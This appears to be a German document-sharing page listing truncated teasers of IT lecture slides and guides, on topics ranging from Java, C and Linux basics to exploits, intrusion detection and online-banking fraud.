cs106 Informatiklabor Teil 1: Java-Installation Herbstsemester 2009 cs106 Informatiklabor Teil 1: Java-Installation Florian Zeller Vorgehen und Ziele Wöchentlich eine Übung Unterstützte Bearbeitung während den Übungsstunden Austausch mit älteren Semestern

Mehr

1KONFIGURATIONS MANAGEMENT

1KONFIGURATIONS MANAGEMENT 1KONFIGURATIONS MANAGEMENT Copyright 24. Juni 2005 Funkwerk Enterprise Communications GmbH Bintec Workshop Version 0.9 Ziel und Zweck Haftung Marken Copyright Richtlinien und Normen Wie Sie Funkwerk Enterprise

Mehr

Grundlagen zur nebenläufigen Programmierung in Java

Grundlagen zur nebenläufigen Programmierung in Java Grundlagen zur nebenläufigen Programmierung in Java Karlsruher Entwicklertag 2013 5. Juni 2013 Referent: Christian Kumpe Inhalt des Vortrags Was zeigt dieser Vortrag? Ein einfaches Beispiel mit allerlei

Mehr

Simulation von in VHDL beschriebenen Systemen

Simulation von in VHDL beschriebenen Systemen Simulation von in VHDL beschriebenen Systemen Prof. Dr. Paul Molitor Institut für Informatik Martin-Luther-Universität Halle Aufbau der Lehrveranstaltung Literaturangaben Allgemeines zum Entwurf digitaler

Mehr

Breaking the Kill Chain

Breaking the Kill Chain Breaking the Kill Chain Eine ganzheitliche Lösung zur Abwehr heutiger Angriffe Frank Barthel, Senior System Engineer Copyright Fortinet Inc. All rights reserved. Typischer Ablauf eines zielgerichteten

Mehr

Programmierkurs: Delphi: Einstieg

Programmierkurs: Delphi: Einstieg Seite 1 von 6 Programmierkurs: Delphi: Einstieg Aus Wikibooks Inhaltsverzeichnis 1 Einstieg Einstieg Was ist Delphi Borland Delphi ist eine RAD-Programmierumgebung von Borland. Sie basiert auf der Programmiersprache

Mehr

Bundesministerium für Gesundheit und Soziale Sicherung. Gefördert vom. Datenschutz und Datensicherheit. Aufgaben

Bundesministerium für Gesundheit und Soziale Sicherung. Gefördert vom. Datenschutz und Datensicherheit. Aufgaben Gefördert vom Bundesministerium für Gesundheit und Soziale Sicherung Datenschutz und Datensicherheit Inhaltsverzeichnis Vorwort... 4 1 zu Kapitel 1... 5 1.1 Aufgabe 1 Gefährdung von Daten...5 1.2 Aufgabe

Mehr

an Hand eines Beispiels Konsole

an Hand eines Beispiels Konsole Versionskontrolle an Hand eines Beispiels Konsole 1 / 14 PAUL SCHEREMET Inhaltsverzeichnis Einleitung 3 Das Repository anlegen (init) 4 Das erste Modul importieren (import) 5 Module auschecken (checkout

Mehr

BACKUP Datensicherung unter Linux

BACKUP Datensicherung unter Linux BACKUP Datensicherung unter Linux Von Anwendern Für Anwender: Datensicherung in Theorie und Praxis! Teil 4: Datenrettung Eine Vortragsreihe der Linux User Group Ingolstadt e.v. (LUG IN) in 4 Teilen Die

Mehr

MEMO_MINUTES. Update der grandma2 via USB. Paderborn, 29.06.2012 Kontakt: tech.support@malighting.com

MEMO_MINUTES. Update der grandma2 via USB. Paderborn, 29.06.2012 Kontakt: tech.support@malighting.com MEMO_MINUTES Paderborn, 29.06.2012 Kontakt: tech.support@malighting.com Update der grandma2 via USB Dieses Dokument soll Ihnen helfen, Ihre grandma2 Konsole, grandma2 replay unit oder MA NPU (Network Processing

Mehr

Exploits Wie kann das sein?

Exploits Wie kann das sein? Exploits Durch eine Schwachstelle im Programm xyz kann ein Angreifer Schadcode einschleusen. Manchmal reicht es schon irgendwo im Internet auf ein präpariertes Jpg-Bildchen zu klicken und schon holt man

Mehr

COMPILER & CODE ANALYSE. Eine Einführung in die Code Analyse auf Grundlage von Compilern und deren Optimierung. 1

COMPILER & CODE ANALYSE. Eine Einführung in die Code Analyse auf Grundlage von Compilern und deren Optimierung. 1 1 COMPILER & CODE ANALYSE Eine Einführung in die Code Analyse auf Grundlage von Compilern und deren Optimierung. 1 INHALT Einleitung Werkzeuge Compiler Aufbau Optimierung Beispiel Code Analyse Einführung

Mehr

Was Wer Wie Wo tut? Intrusion Detection

Was Wer Wie Wo tut? Intrusion Detection Was Wer Wie Wo tut? Intrusion Detection Bernhard Schneck, GeNUA mbh München, 2005-02-14 1 Themen Intrusion Detection Einführung Risiken LAN und WLAN Abgreifstellen LAN und WLAN GeNUDetect Funktion, Struktur,

Mehr

Einführung in die Programmiersprache C

Einführung in die Programmiersprache C Einführung in die Programmiersprache C 10 Sicheres Programmieren Alexander Sczyrba Robert Homann Georg Sauthoff Universität Bielefeld, Technische Fakultät Literatur Klein, Buffer Overflows und Format-String-Schwachstellen.

Mehr

Festplattenverschlüsselung

Festplattenverschlüsselung Festplattenverschlüsselung TrueCrypt Sebastian Berschneider sebastian.berschneider@informatik.stud.uni-erlangen.de 1 6. J u n i 2 0 1 0 Motivation Bei physischem Zugang des Angreifers können Schutzsysteme

Mehr

STRG + A = STRG + C = STRG + X = STRG + V = STRG + Alt + Entf = STRG + S =

STRG + A = STRG + C = STRG + X = STRG + V = STRG + Alt + Entf = STRG + S = Wie heißen die Leisten? Was bedeuten die Tastenkombinationen mit STRG? STRG + A STRG + C STRG + X STRG + V STRG + Alt + Entf STRG + S STRG + A = STRG + C = STRG + X = STRG + V = STRG + Alt + Entf = STRG

Mehr

Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik

Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik Wo ist mein Geld? Identitätsmissbrauch im Online-Banking Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik C. Sorge 2 Überblick Rechner des Kunden Server der Bank

Mehr

C++-Zusammenfassung. H. Schaudt. August 18, 2005

C++-Zusammenfassung. H. Schaudt. August 18, 2005 C++-Zusammenfassung H. Schaudt August 18, 2005 1 Datentypen 1.1 Grunddatentypen int (-32xxx bis +32xxx, implementerungs-abhängig) char -128 bis +128 float double bool (C++) int und char sind austauschbar:

Mehr

Praktikum RO1 Einführung Linux / Ubuntu / Bash

Praktikum RO1 Einführung Linux / Ubuntu / Bash Praktikum RO1 Einführung Linux / Ubuntu / Bash Ubuntu Ubuntu 10.04 läuft als Gastsystem auf der virtuellen Maschine Virtuel Box. Das vorbereitete Ubuntu liegt auf der Festplatte Daten_1 ( \D:\VM'sUbuntu_10.04

Mehr

HiOPC Hirschmann Netzmanagement. Anforderungsformular für eine Lizenz. Order form for a license

HiOPC Hirschmann Netzmanagement. Anforderungsformular für eine Lizenz. Order form for a license HiOPC Hirschmann Netzmanagement Anforderungsformular für eine Lizenz Order form for a license Anforderungsformular für eine Lizenz Vielen Dank für Ihr Interesse an HiOPC, dem SNMP/OPC Gateway von Hirschmann

Mehr

Tutorium 1 Systemadministration 2 - Linux Universität Hildesheim

Tutorium 1 Systemadministration 2 - Linux Universität Hildesheim Tutorium 1 Systemadministration 2 - Linux Universität Hildesheim Jens Rademacher 16.06.2014 1. Theorie: Verzeichnisbaum Eine Auswahl einiger Verzeichnisse. / # Root-Verzeichnis /home/ # Enthält alle Home-Verzeichnisse

Mehr

E-Mail-Exploits und ihre Gefahren

E-Mail-Exploits und ihre Gefahren E-Mail-Exploits und ihre Gefahren Warum zum Erkennen von E-Mail-Exploits eine beson dere Engine benötigt wird In diesem White Paper erfahren Sie, worum es sich bei E-Mail-Exploits handelt und welche E-Mail-Exploits

Mehr